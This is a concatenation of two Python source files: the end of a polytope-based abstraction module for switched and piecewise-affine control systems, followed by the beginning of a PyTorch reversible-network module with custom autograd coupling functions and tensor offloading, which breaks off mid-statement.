ssys.list_subsys[subsys_list[i]] if len(ss.E) > 0: rd, xd = pc.cheby_ball(ss.Wset) else: rd = 0. if conservative: # Don't use trans_set trans_set = None else: # Use original cell as trans_set trans_set = orig_list[orig[i]] S0 = solve_feasible( si, sj, ss, N, closed_loop, use_all_horizon, trans_set, max_num_poly ) msg = '\n Working with partition cells: {i}, {j}'.format(i=i, j=j) logger.info(msg) msg = '\t{i} (#polytopes = {num}), and:\n'.format(i=i, num=len(si)) msg += '\t{j} (#polytopes = {num})\n'.format(j=j, num=len(sj)) if ispwa: msg += '\t with active subsystem: ' msg += '{sys}\n'.format(sys=subsys_list[i]) msg += '\t Computed reachable set S0 with volume: ' msg += '{vol}\n'.format(vol=S0.volume) logger.debug(msg) #logger.debug('si \cap s0') isect = si.intersect(S0) vol1 = isect.volume risect, xi = pc.cheby_ball(isect) #logger.debug('si \ s0') rsi, xd = pc.cheby_ball(si) vol2 = si.volume-vol1 # not accurate. need to check polytope class if vol1 <= min_cell_volume: logger.warning('\t too small: si \cap Pre(sj), ' 'so discard intersection') if vol1 <= min_cell_volume and isect: logger.warning('\t discarded non-empty intersection: ' 'consider reducing min_cell_volume') if vol2 <= min_cell_volume: logger.warning('\t too small: si \ Pre(sj), so not reached it') # indicate if S0 has exists in sol check_isect = False # We don't want our partitions to be smaller than the disturbance set # Could be a problem since cheby radius is calculated for smallest # convex polytope, so if we have a region we might throw away a good # cell. if (vol1 > min_cell_volume) and (risect > rd) and \ (vol2 > min_cell_volume) and (rsi > rd): # check if the intersection has existed in current partitions for idx in range(len(sol)): if(sol[idx] == isect): logger.info('Found: {idx} ---> {j} '.format(idx=idx, j=j)) logger.info('intersection exists.\n') transitions[j, idx] = 1 check_isect = True if not check_isect: # Make sure new areas are Regions and add proposition lists if len(isect) == 0: isect = pc.Region([isect], si.props) else: isect.props = si.props.copy() # add intersection in sol isect_list = pc.separate(isect) sol.append(isect_list[0]) n_cells = len(sol) new_idx = n_cells-1 """Update adjacency matrix""" old_adj = np.nonzero(adj[i, :])[0] adj = np.pad(adj, (0, 1), 'constant') # cell i and new_idx are adjacent adj[i, new_idx] = 1 adj[new_idx, i] = 1 adj[new_idx, new_idx] = 1 if not conservative: orig = np.hstack([orig, orig[i]]) msg = '' if logger.getEffectiveLevel() <= logging.DEBUG: msg += '\t\n Adding states {new_idx}\n'.format(new_idx= new_idx) logger.debug(msg) for k in np.setdiff1d(old_adj, [i,n_cells-1]): # Every "old" neighbor must be the neighbor # of at least one of the new if pc.is_adjacent(sol[new_idx], sol[k]): adj[new_idx, k] = 1 adj[k, new_idx] = 1 elif remove_trans and (trans_length == 1): # Actively remove transitions between non-neighbors transitions[new_idx, k] = 0 transitions[k, new_idx] = 0 """Update transition matrix""" transitions = np.pad(transitions, (0,1), 'constant') adj_k = reachable_within(trans_length, adj, adj) # transitions i ---> k for k is neighbor of new_idx should be # kept by new_idx transitions[:, new_idx] = np.multiply(transitions[:, i], adj_k[:, i]) # if j and new_idx are neighbor, then add new_idx ---> j if adj_k[j, new_idx] != 0: transitions[j, new_idx] = 1 """Update IJ matrix""" IJ = np.pad(IJ, (0, 1), 'constant') sym_adj_change(IJ, adj_k, transitions, i) sym_adj_change(IJ, adj_k, transitions, new_idx) if logger.getEffectiveLevel() <= logging.DEBUG: msg = '\n\n Updated adj: \n{adj}'.format(adj=adj) msg += '\n\n Updated trans: \n{trans}'.format(trans= transitions) msg += '\n\n Updated IJ: \n{IJ}'.format(IJ=IJ) logger.debug(msg) logger.info('Divided region: {i}\n'.format(i=i)) elif vol2 < abs_tol: logger.info('Found: {i} ---> {j}\n'.format(i=i, j=j)) transitions[j, i] = 1 else: if logger.level <= logging.DEBUG: msg = '\t Unreachable: {i} --X--> {j}\n'.format(i=i, j=j) msg += '\t\t diff vol: {vol2}\n'.format(vol2=vol2) msg += '\t\t intersect vol: {vol1}\n'.format(vol1=vol1) logger.debug(msg) else: logger.info('\t unreachable\n') transitions[j, i] = 0 # check to avoid overlapping Regions if debug: tmp_part = PropPreservingPartition( domain=part.domain, regions=sol, adj=sp.lil_matrix(adj), prop_regions=part.prop_regions ) assert(tmp_part.is_partition() ) n_cells = len(sol) progress_ratio = 1 - float(np.sum(IJ) ) /n_cells**2 progress += [progress_ratio] msg = '\t total # polytopes: {n_cells}\n'.format(n_cells=n_cells) msg += '\t progress ratio: {pr}\n'.format(pr=progress_ratio) logger.info(msg) iter_count += 1 # needs to be removed later # if(iter_count>=700): # break # no plotting ? if not plotit: continue if plt is None or plot_partition is None: continue if iter_count % plot_every != 0: continue tmp_part = PropPreservingPartition( domain=part.domain, regions=sol, adj=sp.lil_matrix(adj), prop_regions=part.prop_regions ) # plot pair under reachability check ax2.clear() si_tmp.plot(ax=ax2, color='green') sj_tmp.plot(ax2, color='red', hatch='o', alpha=0.5) plot_transition_arrow(si_tmp, sj_tmp, ax2) S0.plot(ax2, color='none', hatch='/', alpha=0.3) fig.canvas.draw() # plot partition ax1.clear() plot_partition(tmp_part, transitions.T, ax=ax1, color_seed=23) # plot dynamics ssys.plot(ax1, show_domain=False) # plot hatched continuous propositions part.plot_props(ax1) fig.canvas.draw() # scale view based on domain, # not only the current polytopes si, sj l,u = part.domain.bounding_box ax2.set_xlim(l[0,0], u[0,0]) ax2.set_ylim(l[1,0], u[1,0]) if save_img: fname = 'movie' +str(iter_count).zfill(3) fname += '.' + file_extension fig.savefig(fname, dpi=250) plt.pause(1) new_part = PropPreservingPartition( domain=part.domain, regions=sol, adj=sp.lil_matrix(adj), prop_regions=part.prop_regions ) # check completeness of adjacency matrix if debug: tmp_part = deepcopy(new_part) tmp_part.compute_adj() # Generate transition system and add transitions ofts = trs.FTS() adj = sp.lil_matrix(transitions.T) n = adj.shape[0] ofts_states = range(n) ofts.states.add_from(ofts_states) ofts.transitions.add_adj(adj, ofts_states) # Decorate TS with state labels atomic_propositions = set(part.prop_regions) ofts.atomic_propositions.add_from(atomic_propositions) for state, region in zip(ofts_states, sol): state_prop = region.props.copy() ofts.states.add(state, ap=state_prop) param = { 'N':N, 'trans_length':trans_length, 'closed_loop':closed_loop, 'conservative':conservative, 'use_all_horizon':use_all_horizon, 'min_cell_volume':min_cell_volume, 'max_num_poly':max_num_poly } ppp2orig = [part2orig[x] for x in orig] end_time = os.times()[0] msg = 'Total abstraction time: ' +\ str(end_time - start_time) + '[sec]' print(msg) logger.info(msg) if save_img and plt is not None: fig, ax = plt.subplots(1, 1) plt.plot(progress) ax.set_xlabel('iteration') ax.set_ylabel('progress ratio') ax.figure.savefig('progress.pdf') return AbstractPwa( ppp=new_part, ts=ofts, ppp2ts=ofts_states, pwa=ssys, pwa_ppp=part, ppp2pwa=orig, ppp2sys=subsys_list, orig_ppp=orig_ppp, ppp2orig=ppp2orig, disc_params=param ) def reachable_within(trans_length, adj_k, adj): """Find cells reachable within trans_length hops. """ if trans_length <= 1: return adj_k k = 1 while k < trans_length: adj_k = (np.dot(adj_k, adj)!=0).astype(int) k += 1 adj_k = (adj_k > 0).astype(int) return adj_k def sym_adj_change(IJ, adj_k, transitions, i): horizontal = adj_k[i, :] -transitions[i, :] > 0 vertical = adj_k[:, i] -transitions[:, i] > 0 IJ[i, :] = horizontal.astype(int) IJ[:, i] = vertical.astype(int) # DEFUNCT until further notice def discretize_overlap(closed_loop=False, conservative=False): """default False. UNDER DEVELOPMENT; function signature may change without notice. Calling will result in NotImplementedError. """ raise NotImplementedError # # if rdiff < abs_tol: # logger.info("Transition found") # transitions[i,j] = 1 # # elif (vol1 > min_cell_volume) & (risect > rd) & \ # (num_new_reg[i] <= num_orig_neigh[i]+1): # # # Make sure new cell is Region and add proposition lists # if len(isect) == 0: # isect = pc.Region([isect], si.props) # else: # isect.props = si.props.copy() # # # Add new state # sol.append(isect) # size = len(sol) # # # Add transitions # transitions = np.hstack([transitions, np.zeros([size - 1, 1], # dtype=int) ]) # transitions = np.vstack([transitions, np.zeros([1, size], # dtype=int) ]) # # # All sets reachable from orig cell are reachable from both cells # transitions[size-1,:] = transitions[i,:] # transitions[size-1,j] = 1 # j is reachable from new cell # # # Take care of adjacency # old_adj = np.nonzero(adj[i,:])[0] # # adj = np.hstack([adj, np.zeros([size - 1, 1], dtype=int) ]) # adj = np.vstack([adj, np.zeros([1, size], dtype=int) ]) # adj[i,size-1] = 1 # adj[size-1,i] = 1 # adj[size-1,size-1] = 1 # # for k in np.setdiff1d(old_adj,[i,size-1]): # if pc.is_adjacent(sol[size-1],sol[k],overlap=True): # adj[size-1,k] = 1 # adj[k, size-1] = 1 # else: # # Actively remove (valid) transitions between non-neighbors # transitions[size-1,k] = 0 # transitions[k,size-1] = 0 # # # Assign original proposition cell to new state and update counts # if not conservative: # orig = np.hstack([orig, orig[i]]) # print(num_new_reg) # num_new_reg = np.hstack([num_new_reg, 0]) # num_orig_neigh = np.hstack([num_orig_neigh, np.sum(adj[size-1,:])-1]) # # logger.info("\n Adding state " + str(size-1) + "\n") # # # Just add adjacent cells for checking, # # unless transition already found # IJ = np.hstack([IJ, np.zeros([size - 1, 1], dtype=int) ]) # IJ = np.vstack([IJ, np.zeros([1, size], dtype=int) ]) # horiz2 = adj[size-1,:] - transitions[size-1,:] > 0 # verti2 = adj[:,size-1] - transitions[:,size-1] > 0 # IJ[size-1,:] = horiz2.astype(int) # IJ[:,size-1] = verti2.astype(int) # else: # logger.info("No transition found, intersect vol: " + str(vol1) ) # transitions[i,j] = 0 # # new_part = PropPreservingPartition( # domain=part.domain, # regions=sol, adj=np.array([]), # trans=transitions, prop_regions=part.prop_regions, # original_regions=orig_list, orig=orig) # return new_part def multiproc_discretize(q, mode, ppp, cont_dyn, disc_params): global logger logger = mp.log_to_stderr() name = mp.current_process().name print('Abstracting mode: ' + str(mode) + ', on: ' + str(name)) absys = discretize(ppp, cont_dyn, **disc_params) q.put((mode, absys)) print('Worker: ' + str(name) + 'finished.') def multiproc_get_transitions( q, absys, mode, ssys, params ): global logger logger = mp.log_to_stderr() name = mp.current_process().name print('Merged transitions for mode: ' + str(mode) + ', on: ' + str(name)) trans = get_transitions(absys, mode, ssys, **params) q.put((mode, trans)) print('Worker: ' + str(name) + 'finished.') def multiproc_discretize_switched( ppp, hybrid_sys, disc_params=None, plot=False, show_ts=False, only_adjacent=True ): """Parallel implementation of discretize_switched. Uses the multiprocessing package. """ logger.info('parallel discretize_switched started') modes = list(hybrid_sys.modes) mode_nums = hybrid_sys.disc_domain_size q = mp.Queue() mode_args = dict() for mode in modes: cont_dyn = hybrid_sys.dynamics[mode] mode_args[mode] = (q, mode, ppp, cont_dyn, disc_params[mode]) jobs = [mp.Process(target=multiproc_discretize, args=args) for args in mode_args.values()] for job in jobs: job.start() # flush before join: # http://stackoverflow.com/questions/19071529/ abstractions = dict() for job in jobs: mode, absys = q.get() abstractions[mode] = absys for job in jobs: job.join() # merge their domains (merged_abstr, ap_labeling) = merge_partitions(abstractions) n = len(merged_abstr.ppp) logger.info('Merged partition has: ' + str(n) + ', states') # find feasible transitions over merged partition for mode in modes: cont_dyn = hybrid_sys.dynamics[mode] params = disc_params[mode] mode_args[mode] = (q, merged_abstr, mode, cont_dyn, params) jobs = [mp.Process(target=multiproc_get_transitions, args=args) for args in mode_args.values()] for job in jobs: job.start() trans = dict() for job in jobs: mode, t = q.get() trans[mode] = t # merge the abstractions, creating a common TS merge_abstractions(merged_abstr, trans, abstractions, modes, mode_nums) if plot: plot_mode_partitions(merged_abstr, show_ts, only_adjacent) return merged_abstr def discretize_switched( ppp, hybrid_sys, disc_params=None, plot=False, show_ts=False, only_adjacent=True ): """Abstract switched dynamics over given partition. @type ppp: L{PropPreservingPartition} @param hybrid_sys: dynamics of switching modes @type hybrid_sys: L{SwitchedSysDyn} @param disc_params: discretization parameters passed to L{discretize} for each mode. See L{discretize} for details. @type disc_params: dict (keyed by mode) of dicts. @param plot: save partition images @type plot: bool @param show_ts, only_adjacent: options for L{AbstractPwa.plot}. @return: abstracted dynamics, some attributes are dict keyed by mode @rtype: L{AbstractSwitched} """ if disc_params is None: disc_params = {'N':1, 'trans_length':1} logger.info('discretizing hybrid system') modes = list(hybrid_sys.modes) mode_nums = hybrid_sys.disc_domain_size # discretize each abstraction separately abstractions = dict() for mode in modes: logger.debug(30*'-'+'\n') logger.info('Abstracting mode: ' + str(mode)) cont_dyn = hybrid_sys.dynamics[mode] absys = discretize( ppp, cont_dyn, **disc_params[mode] ) logger.debug('Mode Abstraction:\n' + str(absys) +'\n') abstractions[mode] = absys # merge their domains (merged_abstr, ap_labeling) = merge_partitions(abstractions) n = len(merged_abstr.ppp) logger.info('Merged partition has: ' + str(n) + ', states') # find feasible transitions over merged partition trans = dict() for mode in modes: cont_dyn = hybrid_sys.dynamics[mode] params = disc_params[mode] trans[mode] = get_transitions( merged_abstr, mode, cont_dyn, N=params['N'], trans_length=params['trans_length'] ) # merge the abstractions, creating a common TS merge_abstractions(merged_abstr, trans, abstractions, modes, mode_nums) if plot: plot_mode_partitions(merged_abstr, show_ts, only_adjacent) return merged_abstr def plot_mode_partitions(swab, show_ts, only_adjacent): """Save each mode's partition and final merged partition. """ axs = swab.plot(show_ts, only_adjacent) if not axs: logger.error('failed to plot the partitions.') return n = len(swab.modes) assert(len(axs) == 2*n) # annotate for ax in axs: plot_annot(ax) # save mode partitions for ax, mode in zip(axs[:n], swab.modes): fname = 'merged_' + str(mode) + '.pdf' ax.figure.savefig(fname) # save merged partition for ax, mode in zip(axs[n:], swab.modes): fname = 'part_' + str(mode) + '.pdf' ax.figure.savefig(fname) def plot_annot(ax): fontsize = 5 for tick in ax.xaxis.get_major_ticks(): tick.label1.set_fontsize(fontsize) for tick in ax.yaxis.get_major_ticks(): tick.label1.set_fontsize(fontsize) ax.set_xlabel('$v_1$', fontsize=fontsize+6) ax.set_ylabel('$v_2$', fontsize=fontsize+6) def merge_abstractions(merged_abstr, trans, abstr, modes, mode_nums): """Construct merged transitions. @type merged_abstr: L{AbstractSwitched} @type abstr: dict of L{AbstractPwa} """ # TODO: check equality of atomic proposition sets aps = abstr[modes[0]].ts.atomic_propositions logger.info('APs: ' + str(aps)) sys_ts = trs.FTS() # create stats n = len(merged_abstr.ppp) states = range(n) sys_ts.states.add_from(states) sys_ts.atomic_propositions.add_from(aps) # copy AP labels from regions to discrete states ppp2ts = states for (i, state) in enumerate(ppp2ts): props = merged_abstr.ppp[i].props sys_ts.states[state]['ap'] = props # create mode actions sys_actions = [str(s) for e,s in modes] env_actions = [str(e) for e,s in modes] # no env actions ? if mode_nums[0] == 0: actions_per_mode = { (e,s):{'sys_actions':str(s)} for e,s in modes } sys_ts.sys_actions.add_from(sys_actions) elif mode_nums[1] == 0: # no sys actions actions_per_mode = { (e,s):{'env_actions':str(e)} for e,s in modes } sys_ts.env_actions.add_from(env_actions) else: actions_per_mode = { (e,s):{'env_actions':str(e), 'sys_actions':str(s)} for e,s in modes } sys_ts.env_actions.add_from([str(e) for e,s in modes]) sys_ts.sys_actions.add_from([str(s) for e,s in modes]) for mode in modes: env_sys_actions = actions_per_mode[mode] adj = trans[mode] sys_ts.transitions.add_adj( adj = adj, adj2states = states, **env_sys_actions ) merged_abstr.ts = sys_ts merged_abstr.ppp2ts = ppp2ts def get_transitions( abstract_sys, mode, ssys, N=10, closed_loop=True, trans_length=1 ): """Find which transitions are feasible in given mode. Used for the candidate transitions of the merged partition. @rtype: scipy.sparse.lil_matrix """ logger.info('checking which transitions remain feasible after merging') part = abstract_sys.ppp # Initialize matrix for pairs to check IJ = part.adj.copy() if trans_length > 1: k = 1 while k < trans_length: IJ = np.dot(IJ, part.adj) k += 1 IJ = (IJ > 0).astype(int) # Initialize output n = len(part) transitions = sp.lil_matrix((n, n), dtype=int) # Do the abstraction n_checked = 0 n_found = 0 while np.sum(IJ) > 0: n_checked += 1 ind = np.nonzero(IJ) i = ind[1][0] j = ind[0][0] IJ[j,i] = 0 logger.debug('checking transition: ' + str(i) + ' -> ' + str(j)) si = part[i] sj = part[j] # Use original cell as trans_set trans_set = abstract_sys.ppp2pwa(mode, i)[1] active_subsystem = abstract_sys.ppp2sys(mode, i)[1] trans_feasible = is_feasible( si, sj, active_subsystem, N, closed_loop = closed_loop, trans_set = trans_set ) if trans_feasible: transitions[i, j] = 1 msg = '\t Feasible transition.' n_found += 1 else: transitions[i, j] = 0 msg = '\t Not feasible transition.' logger.debug(msg) logger.info('Checked: ' + str(n_checked)) logger.info('Found: ' + str(n_found)) assert n_checked != 0, 'would divide ' logger.info('Survived merging: ' + str(float(n_found) / n_checked) + ' % ') return transitions def multiproc_merge_partitions(abstractions): """LOGTIME in #processors parallel merging. Assuming sufficient number of processors. UNDER DEVELOPMENT; function signature may change without notice. Calling will result in NotImplementedError. """ raise NotImplementedError def merge_partitions(abstractions): """Merge multiple abstractions. @param abstractions: keyed by mode @type abstractions: dict of L{AbstractPwa} @return: (merged_abstraction, ap_labeling) where: - merged_abstraction: L{AbstractSwitched} - ap_labeling: dict """ if len(abstractions) == 0: warnings.warn('Abstractions empty, nothing to merge.') return # consistency check for ab1 in abstractions.values(): for ab2 in abstractions.values(): p1 = ab1.ppp p2 = ab2.ppp if p1.prop_regions != p2.prop_regions: msg = 'merge: partitions have different sets ' msg += 'of continuous propositions' raise Exception(msg) if not (p1.domain.A == p2.domain.A).all() or \ not (p1.domain.b == p2.domain.b).all(): raise Exception('merge: partitions have different domains') # check equality of original PPP partitions if ab1.orig_ppp == ab2.orig_ppp: logger.info('original partitions happen to be equal') init_mode = list(abstractions.keys())[0] all_modes = set(abstractions) remaining_modes = all_modes.difference(set([init_mode])) print('init mode: ' + str(init_mode)) print('all modes: ' + str(all_modes)) print('remaining modes: ' + str(remaining_modes)) # initialize iteration data prev_modes = [init_mode] # Create a list of merged-together regions ab0 = abstractions[init_mode] regions = list(ab0.ppp) parents = {init_mode:list(range(len(regions) ))} ap_labeling = {i:reg.props for i,reg in enumerate(regions)} for cur_mode in remaining_modes: ab2 = abstractions[cur_mode] r = merge_partition_pair( regions, ab2, cur_mode, prev_modes, parents, ap_labeling ) regions, parents, ap_labeling = r prev_modes += [cur_mode] new_list = regions # build adjacency based on spatial adjacencies of # component abstractions. # which justifies the assumed symmetry of part1.adj, part2.adj # Basically, if two regions are either 1) part of the same region in one of # the abstractions or 2) adjacent in one of the abstractions, then the two # regions are adjacent in the switched dynamics. n_reg = len(new_list) adj = np.zeros([n_reg, n_reg], dtype=int) for i, reg_i in enumerate(new_list): for j, reg_j in enumerate(new_list[0:i]): touching = False for mode in abstractions: pi = parents[mode][i] pj = parents[mode][j] part = abstractions[mode].ppp if (part.adj[pi, pj] == 1) or (pi == pj): touching = True break if not touching: continue if pc.is_adjacent(reg_i, reg_j): adj[i,j] = 1 adj[j,i] = 1 adj[i,i] = 1 ppp = PropPreservingPartition( domain=ab0.ppp.domain, regions=new_list, prop_regions=ab0.ppp.prop_regions, adj=adj ) abstraction = AbstractSwitched( ppp=ppp, modes=abstractions, ppp2modes=parents, ) return (abstraction, ap_labeling) def merge_partition_pair( old_regions, ab2, cur_mode, prev_modes, old_parents, old_ap_labeling ): """Merge an Abstraction with the current partition iterate. @param old_regions: A list of C{Region} that is from either: 1. The ppp of the first (initial) L{AbstractPwa} to be merged. 2. A list of already-merged regions @type old_regions: list of C{Region} @param ab2: Abstracted piecewise affine dynamics to be merged into the @type ab2: L{AbstractPwa} @param cur_mode: mode to be merged @type cur_mode: tuple @param prev_modes: list of modes that have already been merged together @type prev_modes: list of tuple @param old_parents: dict of modes that have already been merged to dict of indices of new regions to indices of regions @type old_parents: dict of modes to list of region indices in list C{old_regions} or dict of region indices to regions in original ppp for that mode @param old_ap_labeling: dict of states of already-merged modes to sets of propositions for each state @type old_ap_labeling: dict of tuples to sets @return: the following: - C{new_list}, list of new regions - C{parents}, same as input param C{old_parents}, except that it includes the mode that was just merged and for list of regions in return value C{new_list} - C{ap_labeling}, same as input param C{old_ap_labeling}, except that it includes the mode that was just merged. """ logger.info('merging partitions') part2 = ab2.ppp modes = prev_modes + [cur_mode] new_list = [] parents = {mode:dict() for mode in modes} ap_labeling = dict() for i in range(len(old_regions)): for j in range(len(part2)): isect = pc.intersect(old_regions[i], part2[j]) rc, xc = pc.cheby_ball(isect) # no intersection ? if rc < 1e-5: continue logger.info('merging region: A' + str(i) + ', with: B' + str(j)) # if Polytope, make it Region if len(isect) == 0: isect = pc.Region([isect]) # label the Region with propositions isect.props = old_regions[i].props.copy() new_list.append(isect) idx = new_list.index(isect) # keep track of parents for mode in prev_modes: parents[mode][idx] = old_parents[mode][i] parents[cur_mode][idx] = j # union of AP labels from parent states ap_label_1 = old_ap_labeling[i] ap_label_2 = ab2.ts.states[j]['ap'] logger.debug('AP label 1: ' + str(ap_label_1)) logger.debug('AP label 2: ' + str(ap_label_2)) # original partitions may be different if pwa_partition used # but must originate from same initial partition, # i.e., have same continuous propositions, checked above # # so no two intersecting regions can have different AP labels, # checked here if ap_label_1 != ap_label_2: msg = 'Inconsistent AP labels between intersecting regions\n' msg += 'of partitions of switched system.' raise Exception(msg) ap_labeling[idx] = ap_label_1 return new_list, parents, ap_labeling
core.py
import copy import enum import threading import typing import torch import torch.utils.checkpoint DUAL_OR_QUAD_TENSOR = typing.Union[typing.Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor], typing.Tuple[torch.Tensor, torch.Tensor]] TENSOR_OR_LIST = typing.Union[typing.List[torch.Tensor], torch.Tensor] COUPLING = typing.Callable[[torch.Tensor, TENSOR_OR_LIST], TENSOR_OR_LIST] FUSED_OPTIMIZER = typing.Optional[typing.Callable[[typing.Iterable], torch.optim.Optimizer]] class MemoryModes(enum.IntEnum): no_savings = 0 checkpoint = 1 autograd_graph = 2 autograd_function = 3 class _ReplaceGrad(torch.autograd.Function): @staticmethod def forward(ctx, inp0: torch.Tensor, inp1: torch.Tensor, tmp_inp0: torch.Tensor, tmp_inp1: torch.Tensor): ctx.save_for_backward(inp0.detach(), inp1.detach()) return inp0, inp1 @staticmethod def backward(ctx, grad0: torch.Tensor, grad1: torch.Tensor): tmp_inp0, tmp_inp1 = ctx.saved_tensors return grad0, grad1, tmp_inp0, tmp_inp1 def _set_device(mod: torch.nn.Module, device: str) -> torch.nn.Module: if not device: return mod return copy.deepcopy(mod).to(device, non_blocking=True) def split_tensor_list(inp: typing.Union[typing.Iterable[torch.Tensor], torch.Tensor] ) -> typing.Union[typing.Tuple[torch.Tensor, typing.List[torch.Tensor]], torch.Tensor]: if isinstance(inp, torch.Tensor): return inp if isinstance(inp, typing.Iterable): inp = list(inp) return inp[0], inp[1:] ValueError(f"Unsupported Type {type(inp)}") def take_0th_tensor(inp: typing.Union[typing.Iterable[torch.Tensor], torch.Tensor]) -> torch.Tensor: out = split_tensor_list(inp) if not isinstance(out, torch.Tensor): return out[0] return inp class ReversibleWrapper(torch.nn.Module): def __init__(self, wrapped_module: torch.nn.Module, coupling_forward: typing.Optional[COUPLING] = None, coupling_inverse: typing.Optional[COUPLING] = None): """ A handy utility-module that allows accessing inverses without rewriting significant amounts of code. This module does not do reversibility by itself. It's mostly used as a storage object. :param wrapped_module: the module that's supposed to be run in a revnet-like structure :param coupling_forward: RevNet uses y0 = (x0 + f(x1)) as a coupling function, but this allows you to set a custom one. For example, MomentumNet (https://arxiv.org/abs/2102.07870) uses y0 = (beta * x0 + (1 - beta) * f(x1)). The inputs to the coupling function are the residual stream and the function output. For more information, look at the examples. default = revnet couplint :param coupling_inverse: The inverse of the coupling function. default = revnet inverse """ super(ReversibleWrapper, self).__init__() self.wrapped_module = wrapped_module self.coupling_forward = coupling_forward or additive_coupling_forward self.coupling_inverse = coupling_inverse or additive_coupling_inverse def forward(self, x0: torch.Tensor, x1: torch.Tensor, *args, **kwargs) -> TENSOR_OR_LIST: return self.coupling_forward(x0, self.wrapped_module(x1, *args, **kwargs)) def inverse(self, y0: torch.Tensor, y1: torch.Tensor, *args, **kwargs) -> TENSOR_OR_LIST: return self.coupling_inverse(y1, self.wrapped_module(y0, *args, **kwargs)) def _optimizer_step(optimizer_step: typing.Optional[typing.Callable[[], None]], module: torch.nn.Module): optimizer_step() module.zero_grad(set_to_none=True) class _ReversibleHalfResidualSwapFn(torch.autograd.Function): @staticmethod def forward(ctx, x0: torch.Tensor, x1: torch.Tensor, back_x0: torch.Tensor, back_x1: torch.Tensor, mod: ReversibleWrapper, target_device: str, cuda: bool, optimizer_step: typing.Optional[typing.Callable[[], None]], args: typing.Iterable, kwargs: dict): ctx.mod = mod ctx.target_device = target_device ctx.forward_rng_state = torch.get_rng_state() ctx.cuda = cuda ctx.optimizer_step = optimizer_step ctx.args = args ctx.kwargs = kwargs if cuda: ctx.cuda_devices, ctx.cuda_states = torch.utils.checkpoint.get_device_states(x0, x1, back_x0, back_x1) out = _set_device(mod, target_device)(x0, x1, *args, **kwargs) out = split_tensor_list(out) if isinstance(out, torch.Tensor): residual = None else: residual = out[1] out = out[0] return x1, out, back_x0, back_x1, residual @staticmethod def backward(ctx, dy0: torch.Tensor, dy1: torch.Tensor, y0: torch.Tensor, y1: torch.Tensor, _unused ) -> typing.Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, None, None, None, None, None, None]: original_rng_state = torch.get_rng_state() torch.set_rng_state(ctx.forward_rng_state) if dy0 is None: dy0 = torch.zeros_like(y0) if dy1 is None: dy1 = torch.zeros_like(y0) if ctx.cuda: original_cuda_state = torch.utils.checkpoint.get_device_states(dy0, dy1, y0, y1) torch.utils.checkpoint.set_device_states(ctx.cuda_devices, ctx.cuda_states) with torch.enable_grad(): y0 = y0.detach().requires_grad_() y0.retain_grad() new_mod = _set_device(ctx.mod, ctx.target_device) mod_out = take_0th_tensor(new_mod.wrapped_module(y0, *ctx.args, **ctx.kwargs)) with torch.no_grad(): x0 = ctx.mod.coupling_inverse(y1, mod_out.detach()).detach() with torch.enable_grad(): out = ctx.mod.coupling_forward(x0, mod_out) if hasattr(dy1, "thread"): dy1.thread.join() torch.autograd.backward(out, dy1) if ctx.target_device: with torch.no_grad(): for p, new_p in zip(ctx.mod.parameters(), new_mod.parameters()): if new_p.grad is None: continue new_grad = new_p.grad.to(p.device, non_blocking=True) if p.grad is None: p.grad = new_grad continue p.grad.add_(new_grad) if ctx.cuda: torch.utils.checkpoint.set_device_states(*original_cuda_state) torch.set_rng_state(original_rng_state) with torch.enable_grad(): out_grad = ctx.mod.coupling_forward(dy0, y0.grad).detach_() if ctx.optimizer_step is not None: out_grad.thread = threading.Thread(target=_optimizer_step, args=(ctx.optimizer_step, ctx.mod)) out_grad.thread.start() return dy1.detach(), out_grad, x0, y0, None, None, None, None, None, None class TensorOffload(torch.autograd.Function): """ Allows offloading a single tensor to another device, without altering the tensor itself. This is kind of like .to() from pytorch, without forcing the tensor (or parameter!) to stay on the new device forever. """ @staticmethod def forward(ctx, inp: torch.Tensor, reference: torch.Tensor): ctx.device = inp.device return inp.to(device=reference.device, non_blocking=True) @staticmethod def backward(ctx, grad_outputs: torch.Tensor): return grad_outputs.to(ctx.device, non_blocking=True), None offload_tensor = TensorOffload.apply replace_grad = _ReplaceGrad.apply reverse_and_swap = _ReversibleHalfResidualSwapFn.apply def additive_coupling_forward(other_stream: torch.Tensor, fn_out: torch.Tensor) -> TENSOR_OR_LIST: fn_out = split_tensor_list(fn_out) if isinstance(fn_out, torch.Tensor): return other_stream + fn_out return [other_stream + fn_out[0]] + fn_out[1] def additive_coupling_inverse(output: torch.Tensor, fn_out: torch.Tensor) -> TENSOR_OR_LIST: fn_out = split_tensor_list(fn_out) if isinstance(fn_out, torch.Tensor): return output - fn_out return [output - fn_out[0]] + fn_out[1] class ReversibleModuleCache: x0: torch.Tensor x1: torch.Tensor def __call__(self, x0: torch.Tensor, x1: torch.Tensor): self.x0 = x0.detach() self.x1 = x1.detach() def get_key(idx: int, inp: torch.Tensor): return f'Index: {idx}\nSize: {inp.size()}\nDevice: {inp.device}\nDataType: {inp.dtype}' class ReversibleModule(torch.nn.Module): cpu_state: torch.Tensor cuda_states: typing.List[torch.Tensor] def __init__(self, wrapped_module: torch.nn.Module, coupling_forward: typing.Optional[COUPLING] = None, coupling_inverse: typing.Optional[COUPLING] = None, memory_savings: bool = True, cache: typing.Optional[ReversibleModuleCache] = None, target_device: str = "", fused_optimizer: FUSED_OPTIMIZER = None): """ A `ReversibleModule` that does the heavy lifting of dispatching to various backends in an effort to avoid storing all intermediate buffers at the same time. It can wrap any module. :param wrapped_module: The one module that's supposed to be wrapped in a reversible way. (You need multiple sequential modules to see memory gains.) :param coupling_forward: RevNet uses y0 = (x0 + f(x1)) as a coupling function, but this allows you to set a custom one. For example, MomentumNet (https://arxiv.org/abs/2102.07870) uses y0 = (beta * x0 + (1 - beta) * f(x1)). The inputs to the coupling function are the residual stream and the function output. For more information, look at the examples. default = revnet couplint :param coupling_inverse: The inverse of the coupling function. default = revnet inverse :param memory_savings: whether to use memory savings or not. disabling results in a revnet that will allocate all intermediate tensors as a normal non-reversible network would. :param cache: an optional cache that's used to store intermediate buffers for the reversible module. if there's no cache, it will fall back to using autograd functions. :param target_device: Specifies where the parameters should be moved to before computing the forward and backward pass. This allows efficient CPU-offloading. default = no offloading (keep parameters on the device they're on) :param fused_optimizer: Allows an optimizer step to run while the model is computing its backward pass. This means that the gradients don't have to be fully instantiated anymore and can improve speed when used with cpu-offload due to asynchronous compute. It expects a function that generates an optimizer from a list of parameters. (like Adam.__init__) default = no fused optimizer step """ super(ReversibleModule, self).__init__() self.wrapped_module = ReversibleWrapper(wrapped_module, coupling_forward, coupling_inverse) self.target_device = target_device self.memory_savings = memory_savings self.cache = cache self.cuda_devices = [] self.cuda: bool = torch.cuda._initialized self.autocast: bool = 